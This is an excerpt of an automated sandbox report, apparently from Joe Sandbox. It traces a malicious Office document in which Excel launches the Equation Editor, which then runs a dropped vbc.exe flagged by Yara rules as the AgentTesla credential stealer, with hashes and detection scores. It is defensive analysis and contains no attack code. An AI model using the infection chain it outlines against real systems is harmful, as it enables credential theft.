                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:12:49:50
                                                                                                      Start date:08/04/2021
                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                      Imagebase:0x13f6d0000
                                                                                                      File size:27641504 bytes
                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:12:50:13
                                                                                                      Start date:08/04/2021
                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                      Imagebase:0x400000
                                                                                                      File size:543304 bytes
                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:12:50:15
                                                                                                      Start date:08/04/2021
                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                      Imagebase:0xdb0000
                                                                                                      File size:881152 bytes
                                                                                                      MD5 hash:5F968F612F82F74C96DD257793CF917D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 17%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      General

                                                                                                      Start time:12:50:17
                                                                                                      Start date:08/04/2021
                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                                      Imagebase:0xdb0000
                                                                                                      File size:881152 bytes
                                                                                                      MD5 hash:5F968F612F82F74C96DD257793CF917D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:low

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >